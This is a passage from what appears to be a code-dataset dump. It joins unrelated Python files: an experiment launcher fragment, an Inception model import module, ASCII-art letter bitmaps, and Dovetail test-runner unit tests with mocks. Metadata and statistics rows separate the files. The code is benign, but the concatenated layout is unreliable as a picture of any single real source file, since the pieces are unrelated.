# 'olingo-odata4', 'openjpa', 'openmeetings', 'opennlp', 'openwebbeans', 'parquet-mr',
# 'phoenix',
# 'plc4x', 'pulsar', 'qpid-jms', 'ranger', 'reef', 'roller', 'samza', 'santuario-java',
# 'servicecomb-java-chassis', 'shiro', 'storm', 'struts', 'syncope', 'systemml', 'tajo',
# 'tapestry-5', 'tez', 'tika', 'tinkerpop', 'tomcat', 'tomee', 'uima-ruta', 'wicket',
# 'xmlgraphics-fop', 'zeppelin'])
#
# metrics_20_ignore = ['jclouds', 'jena', 'johnzon', 'juneau', 'kafka', 'karaf', 'knox', 'kylin', 'lucene-solr',
# 'manifoldcf', 'maven', 'maven-surefire', 'metron', 'myfaces', 'myfaces-tobago', 'nifi', 'nutch',
# 'ofbiz', 'olingo-odata4', 'openjpa', 'openmeetings', 'opennlp', 'openwebbeans', 'parquet-mr',
# 'phoenix', 'plc4x', 'pulsar', 'qpid-jms', 'ranger', 'reef', 'roller', 'samza', 'santuario-java',
# 'servicecomb-java-chassis', 'shiro', 'storm', 'struts', 'syncope', 'systemml', 'tajo',
# 'tapestry-5', 'tez', 'tika', 'tinkerpop', 'tomcat', 'tomee', 'uima-ruta', 'wicket',
# 'xmlgraphics-fop', 'zeppelin']
#
# metrics_21_ignore = ['accumulo', 'activemq', 'activemq-artemis', 'airavata', 'archiva', 'asterixdb',
# 'atlas', 'avro', 'beam', 'bookkeeper', 'calcite', 'camel', 'carbondata',
# 'cassandra', 'cayenne', 'clerezza', 'cocoon', 'commons-beanutils',
# 'commons-cli', 'commons-codec', 'commons-collections', 'commons-compress',
# 'commons-csv', 'commons-dbcp', 'commons-email', 'commons-io', 'commons-jexl',
# 'commons-lang', 'commons-math', 'commons-net', 'commons-validator',
# 'commons-vfs', 'continuum', 'crunch', 'curator', 'cxf', 'deltaspike',
# 'directory-kerby', 'directory-server', 'directory-studio', 'drill', 'flink',
# 'giraph', 'hadoop', 'hbase', 'helix', 'hive', 'isis', 'jackrabbit',
# 'jackrabbit-oak']
#
# ise_20_metrics = KNN("metrics", n_processes=20, ignore=metrics_20_ignore)
# ise_21_metrics = KNN("metrics", n_processes=20, ignore=metrics_21_ignore)
#
# standard_problem = Approach("smells", "std",
# ignore=['accumulo', 'activemq', 'activemq-artemis', 'airavata', 'archiva', 'asterixdb',
# 'atlas', 'avro', 'beam', 'bookkeeper', 'calcite', 'camel', 'carbondata',
# 'cassandra', 'cayenne', 'clerezza', 'cocoon', 'commons-beanutils', 'commons-cli',
# 'commons-codec', 'commons-collections', 'commons-compress', 'commons-csv',
# 'commons-dbcp', 'commons-email', 'commons-io', 'commons-jexl', 'commons-lang',
# 'commons-math', 'commons-net', 'commons-validator', 'commons-vfs', 'continuum',
# 'crunch', 'curator', 'cxf', 'deltaspike', 'directory-kerby', 'directory-server',
# 'directory-studio', 'drill', 'flink', 'giraph', 'hadoop', 'hbase', 'helix', 'hive',
# 'isis', 'jackrabbit', 'jackrabbit-oak', 'jclouds', 'jena', 'johnzon', 'juneau',
# 'kafka', 'karaf', 'knox', 'kylin', 'lucene-solr', 'manifoldcf', 'maven',
# 'maven-surefire', 'metron', 'myfaces', 'myfaces-tobago', 'nifi', 'nutch', 'ofbiz',
# 'olingo-odata4', 'openjpa', 'openmeetings', 'opennlp', 'openwebbeans', 'parquet-mr',
# 'phoenix', 'plc4x', 'pulsar', 'qpid-jms', 'ranger', 'reef', 'roller', 'samza',
# 'santuario-java',
# 'servicecomb-java-chassis'],
# ignore_clfs=["rf", "mp", "dt", "nb"])
modules = [
# metrics_smells,
# smells,
metrics_2
# metrics_smells
]
ISE2020 = libtmux.Server()
[module(ISE2020) for module in modules]
| 82.954098 | 1,336 | 0.553061 | 2,366 | 25,301 | 5.82967 | 0.102282 | 0.024505 | 0.025375 | 0.033495 | 0.814109 | 0.796563 | 0.780541 | 0.754586 | 0.733706 | 0.72631 | 0 | 0.004351 | 0.255089 | 25,301 | 304 | 1,337 | 83.226974 | 0.72749 | 0.504723 | 0 | 0.246988 | 0 | 0.006024 | 0.342731 | 0.016915 | 0 | 0 | 0 | 0 | 0.018072 | 1 | 0.054217 | false | 0 | 0.03012 | 0 | 0.114458 | 0.012048 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
857e9d8d14b31be7f34086013901851677a8a68f | 1,027 | py | Python | utils/slim_nets/inception.py | SMH17/TensorBoxPy3 | 1aaeb6124e16074f1843a937405f672f41d95bff | [
"Apache-2.0",
"MIT"
] | 12 | 2017-03-30T18:57:11.000Z | 2021-04-11T16:50:18.000Z | utils/slim_nets/inception.py | SMH17/TensorBoxPy3 | 1aaeb6124e16074f1843a937405f672f41d95bff | [
"Apache-2.0",
"MIT"
] | 3 | 2017-06-12T16:42:11.000Z | 2017-12-06T15:23:48.000Z | utils/slim_nets/inception.py | SMH17/TensorBoxPy3 | 1aaeb6124e16074f1843a937405f672f41d95bff | [
"Apache-2.0",
"MIT"
] | 3 | 2017-04-21T16:30:28.000Z | 2020-11-13T16:36:42.000Z | # TensorBoxPy3 https://github.com/SMH17/TensorBoxPy3
"""Brings all inception models under one namespace."""
# pylint: disable=unused-import
from utils.slim_nets.inception_resnet_v2 import inception_resnet_v2
from utils.slim_nets.inception_resnet_v2 import inception_resnet_v2_arg_scope
from utils.slim_nets.inception_v1 import inception_v1
from utils.slim_nets.inception_v1 import inception_v1_arg_scope
from utils.slim_nets.inception_v1 import inception_v1_base
from utils.slim_nets.inception_v2 import inception_v2
from utils.slim_nets.inception_v2 import inception_v2_arg_scope
from utils.slim_nets.inception_v2 import inception_v2_base
from utils.slim_nets.inception_v3 import inception_v3
from utils.slim_nets.inception_v3 import inception_v3_arg_scope
from utils.slim_nets.inception_v3 import inception_v3_base
from utils.slim_nets.inception_v4 import inception_v4
from utils.slim_nets.inception_v4 import inception_v4_arg_scope
from utils.slim_nets.inception_v4 import inception_v4_base
# pylint: enable=unused-import
| 48.904762 | 77 | 0.87926 | 165 | 1,027 | 5.109091 | 0.175758 | 0.149466 | 0.215896 | 0.282325 | 0.837485 | 0.837485 | 0.82325 | 0.80427 | 0.794781 | 0.260973 | 0 | 0.033578 | 0.072055 | 1,027 | 20 | 78 | 51.35 | 0.850997 | 0.15482 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 10 |
85c77af85d76e625eab85835fec0e1b6ff1fd369 | 6,114 | py | Python | alphabet.py | matteogabburo/AsciiWords | dfba74a7309a55daa3cc4fb45f881c15aa588e96 | [
"MIT"
] | null | null | null | alphabet.py | matteogabburo/AsciiWords | dfba74a7309a55daa3cc4fb45f881c15aa588e96 | [
"MIT"
] | null | null | null | alphabet.py | matteogabburo/AsciiWords | dfba74a7309a55daa3cc4fb45f881c15aa588e96 | [
"MIT"
] | null | null | null | #!/bin/python3
c_a = [
[0, 1, 1, 1, 1, 0],
[1, 1, 0, 0, 1, 1],
[1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1]
]
c_b = [
[1, 1, 1, 1, 1, 0],
[1, 1, 0, 0, 0, 1],
[1, 1, 1, 1, 1, 0],
[1, 1, 0, 0, 0, 1],
[1, 1, 1, 1, 1, 0]
]
c_c = [
[0, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0],
[0, 1, 1, 1, 1, 1]
]
c_d = [
[1, 1, 1, 1, 0, 0],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 0, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 1, 1, 0, 0]
]
c_e = [
[1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 1]
]
c_f = [
[1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0]
]
c_g = [
[0, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 0, 0],
[1, 1, 0, 1, 1, 1],
[1, 1, 0, 0, 0, 1],
[0, 1, 1, 1, 1, 0]
]
c_h = [
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1]
]
c_i = [
[0, 1, 1, 0],
[0, 1, 1, 0],
[0, 1, 1, 0],
[0, 1, 1, 0],
[0, 1, 1, 0]
]
c_j = [
[0, 0, 1, 1, 1, 0],
[0, 0, 0, 1, 1, 0],
[0, 0, 0, 1, 1, 0],
[1, 1, 0, 1, 1, 0],
[1, 1, 1, 1, 1, 0]
]
c_k = [
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 1, 0, 0],
[1, 1, 1, 1, 0, 0],
[1, 1, 0, 1, 0, 0],
[1, 1, 0, 0, 1, 1]
]
c_l = [
[1, 1, 0, 0, 0],
[1, 1, 0, 0, 0],
[1, 1, 0, 0, 0],
[1, 1, 0, 0, 0],
[1, 1, 1, 1, 1]
]
c_m = [
[1, 1, 0, 0, 1, 1],
[1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1]
]
c_n = [
[1, 1, 0, 0, 1, 1],
[1, 1, 1, 0, 1, 1],
[1, 1, 0, 1, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1]
]
c_o = [
[0, 1, 1, 1, 1, 0],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[0, 1, 1, 1, 1, 0]
]
c_p = [
[1, 1, 1, 1, 1, 0],
[1, 1, 0, 0, 1, 1],
[1, 1, 1, 1, 1, 0],
[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0]
]
c_q = [
[0, 1, 1, 1, 1, 0, 0],
[1, 1, 0, 0, 1, 1, 0],
[1, 1, 0, 0, 1, 1, 0],
[1, 1, 0, 0, 1, 1, 0],
[0, 1, 1, 1, 0, 1, 1]
]
c_r = [
[1, 1, 1, 1, 1, 0],
[1, 1, 0, 0, 1, 1],
[1, 1, 1, 1, 1, 0],
[1, 1, 0, 0, 1, 0],
[1, 1, 0, 0, 0, 1]
]
c_s = [
[0, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 0],
[0, 0, 0, 0, 1, 1],
[1, 1, 1, 1, 1, 0]
]
c_t = [
[1, 1, 1, 1, 1, 1],
[0, 0, 1, 1, 0, 0],
[0, 0, 1, 1, 0, 0],
[0, 0, 1, 1, 0, 0],
[0, 0, 1, 1, 0, 0]
]
c_u = [
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[0, 1, 1, 1, 1, 0]
]
c_v = [
[1, 0, 0, 0, 0, 1],
[1, 1, 0, 0, 1, 1],
[0, 1, 0, 0, 1, 0],
[0, 1, 1, 1, 1, 0],
[0, 0, 1, 1, 0, 0]
]
c_w = [
[1, 1, 0, 0, 0, 0, 1, 1],
[1, 1, 0, 0, 0, 0, 1, 1],
[1, 1, 0, 1, 1, 0, 1, 1],
[1, 1, 1, 0, 0, 1, 1, 1],
[1, 1, 0, 0, 0, 0, 1, 1]
]
c_x = [
[1, 1, 0, 0, 0, 0, 1, 1],
[0, 1, 1, 0, 0, 1, 1, 0],
[0, 0, 1, 1, 1, 1, 0, 0],
[0, 1, 1, 0, 0, 1, 1, 0],
[1, 1, 0, 0, 0, 0, 1, 1]
]
c_y = [
[1, 1, 0, 0, 0, 0, 1, 1],
[0, 1, 1, 0, 0, 1, 1, 0],
[0, 0, 1, 1, 1, 1, 0, 0],
[0, 0, 0, 1, 1, 0, 0, 0],
[0, 0, 0, 1, 1, 0, 0, 0]
]
c_z = [
[1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 1, 1, 0],
[1, 1, 1, 1, 1, 1, 1],
[0, 1, 1, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 1, 1]
]
c_space = [
[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 0]
]
c_escl = [
[0, 1, 1, 0],
[0, 1, 1, 0],
[0, 1, 1, 0],
[0, 0, 0, 0],
[0, 1, 1, 0]
]
c_quest = [
[0, 1, 1, 1, 0],
[1, 0, 0, 0, 1],
[0, 0, 1, 1, 0],
[0, 0, 0, 0, 0],
[0, 0, 1, 0, 0]
]
c_minus = [
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 1, 1, 1, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0]
]
c_plus = [
[0, 0, 0, 0, 0],
[0, 0, 1, 0, 0],
[0, 1, 1, 1, 0],
[0, 0, 1, 0, 0],
[0, 0, 0, 0, 0]
]
c_mul = [
[0, 0, 0, 0, 0],
[0, 1, 0, 1, 0],
[0, 0, 1, 0, 0],
[0, 1, 0, 1, 0],
[0, 0, 0, 0, 0]
]
c_slash = [
[0, 0, 0, 0, 1],
[0, 0, 0, 1, 0],
[0, 0, 1, 0, 0],
[0, 1, 0, 0, 0],
[1, 0, 0, 0, 0]
]
c_bslash = [
[1, 0, 0, 0, 0],
[0, 1, 0, 0, 0],
[0, 0, 1, 0, 0],
[0, 0, 0, 1, 0],
[0, 0, 0, 0, 1]
]
c_dot = [
[0, 0, 0],
[0, 0, 0],
[0, 0, 0],
[0, 0, 0],
[0, 1, 0]
]
c_com = [
[0, 0, 0],
[0, 0, 0],
[0, 0, 0],
[0, 1, 0],
[1, 0, 0]
]
c_colon = [
[0, 0, 0],
[0, 1, 0],
[0, 0, 0],
[0, 1, 0],
[0, 0, 0]
]
alphabet = {
'a': c_a,
'b': c_b,
'c': c_c,
'd': c_d,
'e': c_e,
'f': c_f,
'g': c_g,
'h': c_h,
'i': c_i,
'j': c_j,
'k': c_k,
'l': c_l,
'm': c_m,
'n': c_n,
'o': c_o,
'p': c_p,
'q': c_q,
'r': c_r,
's': c_s,
't': c_t,
'u': c_u,
'v': c_v,
'w': c_w,
'x': c_x,
'y': c_y,
'z': c_z,
' ': c_space,
'!': c_escl,
'?': c_quest,
'-': c_minus,
'+': c_plus,
'*': c_mul,
'/': c_slash,
'\\': c_bslash,
'.': c_dot,
',': c_com,
':': c_colon
}
| 17.929619 | 33 | 0.225711 | 1,217 | 6,114 | 1.073131 | 0.034511 | 0.545176 | 0.482389 | 0.437979 | 0.821593 | 0.817764 | 0.812404 | 0.807044 | 0.786371 | 0.748851 | 0 | 0.343678 | 0.50458 | 6,114 | 340 | 34 | 17.982353 | 0.087488 | 0.002126 | 0 | 0.513423 | 0 | 0 | 0.00623 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 13 |
a40e3cb162038e76778e6e3f42efcc1dc3cb701c | 32,266 | py | Python | dovetail/tests/unit/test_test_runner.py | xudan2189/dovetail | 89beb8e201e69fa5af1d7a38928e7ea8a501d755 | [
"Apache-2.0"
] | null | null | null | dovetail/tests/unit/test_test_runner.py | xudan2189/dovetail | 89beb8e201e69fa5af1d7a38928e7ea8a501d755 | [
"Apache-2.0"
] | null | null | null | dovetail/tests/unit/test_test_runner.py | xudan2189/dovetail | 89beb8e201e69fa5af1d7a38928e7ea8a501d755 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
#
# Copyright (c) 2018 mokats@intracom-telecom.com and others.
#
# All rights reserved. This program and the accompanying materials
# are made available under the terms of the Apache License, Version 2.0
# which accompanies this distribution, and is available at
# http://www.apache.org/licenses/LICENSE-2.0
##
import unittest
from mock import patch, call, Mock
import dovetail.test_runner as t_runner
__author__ = 'Stamatis Katsaounis <mokats@intracom-telecom.com>'
class TestRunnerTesting(unittest.TestCase):
def setUp(self):
self.patcher1 = patch.object(t_runner, 'dt_logger')
self.patcher2 = patch.object(t_runner.DockerRunner,
'_update_config')
self.logger = self.patcher1.start().return_value
self._update_config = self.patcher2.start().return_value
self.testcase = Mock()
self.testcase_name = 'testcase_name'
self.testcase_type = 'functest'
self.testcase_dict = {}
self.testcase_valid = 'validate_testcase'
self.testcase.testcase = self.testcase_dict
self.testcase.name.return_value = self.testcase_name
self.testcase.validate_testcase.return_value = self.testcase_valid
self.testcase.validate_type.return_value = self.testcase_type
def tearDown(self):
self.patcher1.stop()
self.patcher2.stop()
@patch('dovetail.test_runner.dt_utils')
@patch('dovetail.test_runner.dt_cfg')
@patch('dovetail.test_runner.Container')
def test_run_offline_not_exist(self, mock_container, mock_config,
mock_utils):
t_runner.FunctestRunner.create_log()
mock_config.dovetail_config = {
'offline': True, 'result_dir': 'result_dir'
}
docker_runner = t_runner.TestRunnerFactory.create(self.testcase)
container_obj = Mock()
docker_img_obj = Mock()
container_obj.get_docker_image.return_value = docker_img_obj
container_obj.get_image_id.return_value = False
mock_container.return_value = container_obj
docker_runner.run()
mock_container.assert_called_once_with(self.testcase)
container_obj.get_docker_image.assert_called_once_with()
container_obj.get_image_id.assert_called_once_with(docker_img_obj)
docker_runner.logger.error.assert_called_once_with(
"{} image doesn't exist, can't run offline.".format(
self.testcase_type))
@patch('dovetail.test_runner.dt_utils')
@patch('dovetail.test_runner.dt_cfg')
@patch('dovetail.test_runner.Container')
def test_run__not_offline_no_pull(self, mock_container, mock_config,
mock_utils):
t_runner.YardstickRunner.create_log()
mock_config.dovetail_config = {
'offline': False, 'result_dir': 'result_dir'
}
docker_runner = t_runner.YardstickRunner(self.testcase)
container_obj = Mock()
docker_img_obj = Mock()
container_obj.get_docker_image.return_value = docker_img_obj
container_obj.pull_image.return_value = False
mock_container.return_value = container_obj
docker_runner.run()
mock_container.assert_called_once_with(self.testcase)
container_obj.get_docker_image.assert_called_once_with()
container_obj.pull_image.assert_called_once_with(docker_img_obj)
docker_runner.logger.error.assert_called_once_with(
'Failed to pull the image.')
@patch('dovetail.test_runner.dt_utils')
@patch('dovetail.test_runner.dt_cfg')
@patch('dovetail.test_runner.Container')
def test_run__not_offline_no_create(self, mock_container, mock_config,
mock_utils):
t_runner.BottlenecksRunner.create_log()
mock_config.dovetail_config = {
'offline': False, 'result_dir': 'result_dir'
}
docker_runner = t_runner.BottlenecksRunner(self.testcase)
container_obj = Mock()
docker_img_obj = Mock()
container_obj.get_docker_image.return_value = docker_img_obj
container_obj.pull_image.return_value = True
container_obj.create.return_value = False
mock_container.return_value = container_obj
docker_runner.run()
mock_container.assert_called_once_with(self.testcase)
container_obj.get_docker_image.assert_called_once_with()
container_obj.pull_image.assert_called_once_with(docker_img_obj)
container_obj.create.assert_called_once_with(docker_img_obj)
docker_runner.logger.error.assert_called_once_with(
'Failed to create container.')
@patch('dovetail.test_runner.dt_utils')
@patch('dovetail.test_runner.dt_cfg')
@patch('dovetail.test_runner.Container')
def test_run__not_offline_no_prepare(self, mock_container,
mock_config, mock_utils):
t_runner.FunctestRunner.create_log()
mock_config.dovetail_config = {
'offline': False,
'noclean': False,
'result_dir': 'result_dir'
}
docker_runner = t_runner.FunctestRunner(self.testcase)
container_obj = Mock()
docker_img_obj = Mock()
container_obj.get_docker_image.return_value = docker_img_obj
container_obj.pull_image.return_value = True
container_id = '12345'
container_obj.create.return_value = container_id
mock_container.return_value = container_obj
self.testcase.pre_condition.return_value = ['cmd']
self.testcase.prepare_cmd.return_value = False
self.testcase.post_condition.return_value = ['cmd']
container_obj.exec_cmd.return_value = (1, 'error')
docker_runner.run()
mock_container.assert_called_once_with(self.testcase)
container_obj.get_docker_image.assert_called_once_with()
container_obj.pull_image.assert_called_once_with(docker_img_obj)
container_obj.create.assert_called_once_with(docker_img_obj)
docker_runner.logger.debug.assert_called_with(
'container id: {}'.format(container_id))
self.testcase.pre_condition.assert_called_once_with()
container_obj.exec_cmd.assert_has_calls([
call('cmd'), call('cmd')])
self.testcase.prepare_cmd.assert_called_once_with(self.testcase_type)
self.testcase.post_condition.assert_called_once_with()
docker_runner.logger.error.assert_has_calls([
call('Failed to exec all pre_condition cmds.'),
call('Failed to prepare test case: {}'
.format(self.testcase_name))])
container_obj.clean.assert_called_once_with()
@patch('dovetail.test_runner.dt_utils')
@patch('dovetail.test_runner.dt_cfg')
@patch('dovetail.test_runner.Container')
def test_run__not_offline_prepare(self, mock_container,
mock_config, mock_utils):
t_runner.FunctestRunner.create_log()
mock_config.dovetail_config = {
'offline': False,
'noclean': False,
'result_dir': 'result_dir'
}
docker_runner = t_runner.FunctestRunner(self.testcase)
container_obj = Mock()
docker_img_obj = Mock()
container_obj.get_docker_image.return_value = docker_img_obj
container_obj.pull_image.return_value = True
container_id = '12345'
container_obj.create.return_value = container_id
mock_container.return_value = container_obj
self.testcase.pre_condition.return_value = ['cmd']
self.testcase.prepare_cmd.return_value = True
self.testcase.post_condition.return_value = ['cmd']
self.testcase.cmds = ['cmd']
container_obj.exec_cmd.return_value = (1, 'error')
docker_runner.run()
mock_container.assert_called_once_with(self.testcase)
container_obj.get_docker_image.assert_called_once_with()
container_obj.pull_image.assert_called_once_with(docker_img_obj)
container_obj.create.assert_called_once_with(docker_img_obj)
docker_runner.logger.debug.assert_called_with(
'container id: {}'.format(container_id))
self.testcase.pre_condition.assert_called_once_with()
container_obj.exec_cmd.assert_has_calls([
call('cmd'), call('cmd'), call('cmd')])
self.testcase.prepare_cmd.assert_called_once_with(self.testcase_type)
self.testcase.post_condition.assert_called_once_with()
docker_runner.logger.error.assert_has_calls([
call('Failed to exec all pre_condition cmds.'),
call('Failed to exec {}, ret: {}, msg: {}'
.format('cmd', 1, 'error'))])
container_obj.clean.assert_called_once_with()
@patch('dovetail.test_runner.dt_cfg')
@patch('dovetail.test_runner.dt_utils')
@patch('dovetail.test_runner.os')
def test_archive_logs_no_files(self, mock_os, mock_utils, mock_config):
t_runner.FunctestRunner.create_log()
mock_config.dovetail_config = {'result_dir': 'result_dir'}
docker_runner = t_runner.FunctestRunner(self.testcase)
mock_os.environ = {'DOVETAIL_HOME': 'dovetail_home'}
mock_utils.get_value_from_dict.return_value = []
result = docker_runner.archive_logs()
mock_os.path.join.assert_has_calls([call('dovetail_home', 'results')])
mock_utils.get_value_from_dict.assert_has_calls([
call('report.source_archive_files', self.testcase_dict),
call('report.dest_archive_files', self.testcase_dict)])
self.assertEquals(True, result)
@patch('dovetail.test_runner.dt_cfg')
@patch('dovetail.test_runner.dt_utils')
@patch('dovetail.test_runner.os')
def test_archive_logs_difference_in_files(self, mock_os, mock_utils,
mock_config):
t_runner.FunctestRunner.create_log()
mock_config.dovetail_config = {'result_dir': 'result_dir'}
docker_runner = t_runner.FunctestRunner(self.testcase)
mock_os.environ = {'DOVETAIL_HOME': 'dovetail_home'}
mock_utils.get_value_from_dict.side_effect = [[], ['file']]
result = docker_runner.archive_logs()
mock_os.path.join.assert_has_calls([call('dovetail_home', 'results')])
mock_utils.get_value_from_dict.assert_has_calls([
call('report.source_archive_files', self.testcase_dict),
call('report.dest_archive_files', self.testcase_dict)])
docker_runner.logger.error.assert_called_once_with(
"Can't find corresponding 'result_dest_files' "
"for 'result_source_files' with testcase {}"
.format(self.testcase_name))
self.assertEquals(False, result)
@patch('dovetail.test_runner.dt_cfg')
@patch('dovetail.test_runner.dt_utils')
@patch('dovetail.test_runner.os')
def test_archive_logs_src_file_error(self, mock_os, mock_utils,
mock_config):
t_runner.FunctestRunner.create_log()
mock_config.dovetail_config = {'result_dir': 'result_dir'}
docker_runner = t_runner.FunctestRunner(self.testcase)
mock_os.environ = {'DOVETAIL_HOME': 'dovetail_home'}
mock_utils.get_value_from_dict.side_effect = [['src_file'],
['dst_file']]
mock_os.path.join.side_effect = ['result_path', 'src_file_path',
'dest_file_path']
mock_os.path.isfile.return_value = False
result = docker_runner.archive_logs()
mock_os.path.join.assert_has_calls([
call('dovetail_home', 'results'),
call('result_path', 'src_file'),
call('result_path', 'dst_file')])
mock_utils.get_value_from_dict.assert_has_calls([
call('report.source_archive_files', self.testcase_dict),
call('report.dest_archive_files', self.testcase_dict)])
mock_os.path.isfile.assert_has_calls([call('src_file_path')])
docker_runner.logger.error.assert_called_once_with(
"Can't find file {}.".format('src_file_path'))
self.assertEquals(False, result)
@patch('dovetail.test_runner.dt_cfg')
@patch('dovetail.test_runner.dt_utils')
@patch('dovetail.test_runner.os')
def test_archive_logs_src_file_exists(self, mock_os, mock_utils,
mock_config):
t_runner.FunctestRunner.create_log()
mock_config.dovetail_config = {'result_dir': 'result_dir'}
docker_runner = t_runner.FunctestRunner(self.testcase)
mock_os.environ = {'DOVETAIL_HOME': 'dovetail_home'}
mock_utils.get_value_from_dict.side_effect = [['src_file'],
['dst_file']]
mock_os.path.join.side_effect = ['result_path', 'src_file_path',
'dest_file_path']
mock_os.path.isfile.return_value = True
result = docker_runner.archive_logs()
mock_os.path.join.assert_has_calls([
call('dovetail_home', 'results'),
call('result_path', 'src_file'),
call('result_path', 'dst_file')])
mock_utils.get_value_from_dict.assert_has_calls([
call('report.source_archive_files', self.testcase_dict),
call('report.dest_archive_files', self.testcase_dict)])
mock_os.path.isfile.assert_has_calls([call('src_file_path')])
mock_os.renames.assert_called_once_with(
'src_file_path', 'dest_file_path')
self.assertEquals(True, result)
@patch('dovetail.test_runner.jinja2')
def test_render(self, mock_jinja):
render_obj = Mock()
template_obj = Mock()
mock_jinja.Template.return_value = template_obj
template_obj.render.return_value = render_obj
result = t_runner.FunctestRunner._render('task_template')
mock_jinja.Template.assert_called_once_with('task_template')
template_obj.render.assert_called_with()
self.assertEquals(render_obj, result)
@patch('dovetail.test_runner.dt_cfg')
@patch('dovetail.test_runner.os')
def test_add_testcase_info(self, mock_os, mock_config):
mock_os.getenv.side_effect = ['os_insecure', 'dovetail_home', 'debug',
'os_cacert', 'host_url', 'csar_file',
'heat_templates_archive']
mock_os.environ = {'DEPLOY_SCENARIO': 'deploy_scenario'}
mock_config.dovetail_config = {'build_tag': 'build_tag'}
expected = {
'validate_testcase': 'validate_testcase',
'testcase': 'testcase_name', 'os_insecure': 'os_insecure',
'deploy_scenario': 'deploy_scenario',
'dovetail_home': 'dovetail_home', 'debug': 'debug',
'build_tag': 'build_tag', 'cacert': 'os_cacert',
'host_url': 'host_url', 'csar_file': 'csar_file',
'heat_templates_archive': 'heat_templates_archive'
}
result = t_runner.FunctestRunner._add_testcase_info(self.testcase)
self.testcase.validate_testcase.assert_called_once_with()
self.testcase.name.assert_called_once_with()
mock_os.getenv.assert_has_calls([
call('OS_INSECURE'), call('DOVETAIL_HOME'), call('DEBUG'),
call('OS_CACERT'), call('HOST_URL'), call('CSAR_FILE'),
call('VNF_ARCHIVE_NAME')])
self.assertEquals(expected, result)
@patch('dovetail.test_runner.dt_utils')
@patch('dovetail.test_runner.dt_cfg')
@patch('dovetail.test_runner.os.path')
@patch('dovetail.test_runner.constants')
def test_update_config_no_task_template(self, mock_const, mock_path,
mock_config, mock_utils):
t_runner.FunctestRunner.create_log()
mock_config.dovetail_config = {
'config_dir': 'one', 'pod_file': 'two', 'result_dir': 'three'}
docker_runner = t_runner.FunctestRunner(self.testcase)
mock_path.join.side_effect = ['config_file', 'pod_file']
mock_utils.read_yaml_file.return_value = 'pod_info'
mock_utils.read_plain_file.return_value = None
mock_const.CONF_PATH = 'conf_path'
self.patcher2.stop()
result = docker_runner._update_config(self.testcase)
self.patcher2.start()
mock_path.join.assert_has_calls([
call('three', 'endpoint_info.json'),
call('conf_path', docker_runner.config_file_name)])
mock_utils.read_plain_file.assert_called_once_with(
'config_file', docker_runner.logger)
self.assertEquals(None, result)
@patch('dovetail.test_runner.yaml.safe_load')
@patch('dovetail.test_runner.dt_utils')
@patch('dovetail.test_runner.dt_cfg')
@patch('dovetail.test_runner.os.path')
@patch('dovetail.test_runner.constants')
@patch.object(t_runner.DockerRunner, '_add_testcase_info')
@patch.object(t_runner.DockerRunner, '_render')
def test_update_config_pod_info_key_err(self, mock_render, mock_add_info,
mock_const, mock_path, mock_config,
mock_utils, mock_load):
t_runner.FunctestRunner.create_log()
mock_config.dovetail_config = {
'config_dir': 'one', 'pod_file': 'two', 'result_dir': 'three'}
docker_runner = t_runner.FunctestRunner(self.testcase)
mock_path.join.side_effect = ['config_file', 'pod_file']
mock_utils.read_yaml_file.return_value = {'key': 'value'}
mock_utils.read_plain_file.return_value = True
mock_const.CONF_PATH = 'conf_path'
mock_add_info.return_value = {'config_item': 'item'}
mock_render.return_value = 'full_task'
mock_load.return_value = {'full_task_yaml': 'full_value'}
self.patcher2.stop()
